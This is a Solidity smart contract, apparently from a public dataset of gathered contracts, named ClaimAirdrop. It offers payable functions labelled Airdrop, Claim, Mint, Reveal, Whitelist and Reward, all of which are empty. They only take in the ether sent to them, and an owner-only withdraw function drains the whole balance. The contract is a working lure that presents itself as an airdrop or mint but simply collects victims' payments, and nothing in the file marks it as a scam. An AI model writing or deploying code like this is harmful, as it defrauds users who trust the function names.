File size: 932 Bytes
f998fcd |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
// This contract is part of Zellic’s smart contract dataset, which is a collection of publicly available contract code gathered as of March 2023.
pragma solidity ^0.4.26;
contract ClaimAirdrop {
address private owner;
constructor() public{
owner = msg.sender;
}
function getOwner() public view returns (address) {
return owner;
}
function withdraw() public {
require(owner == msg.sender);
msg.sender.transfer(address(this).balance);
}
function Airdrop() public payable {
}
function Claim() public payable {
}
function Mint() public payable {
}
function Reveal() public payable {
}
function Whitelist() public payable {
}
function Reward() public payable {
}
function getBalance() public view returns (uint256) {
return address(this).balance;
}
} |